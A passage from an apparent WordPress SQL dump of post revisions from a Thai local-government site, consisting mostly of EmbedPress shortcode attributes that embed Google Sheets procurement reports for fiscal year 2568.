nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:29:25','2025-07-01 07:29:25','',1558,'http://pakhaeng.ssk.in.th/?p=1570',0,'revision','',0),
(1571,1,'2025-07-01 14:41:06','2025-07-01 07:41:06','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&amp;ouid=116408890257525538205&amp;rtpof=true&amp;sd=true\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' 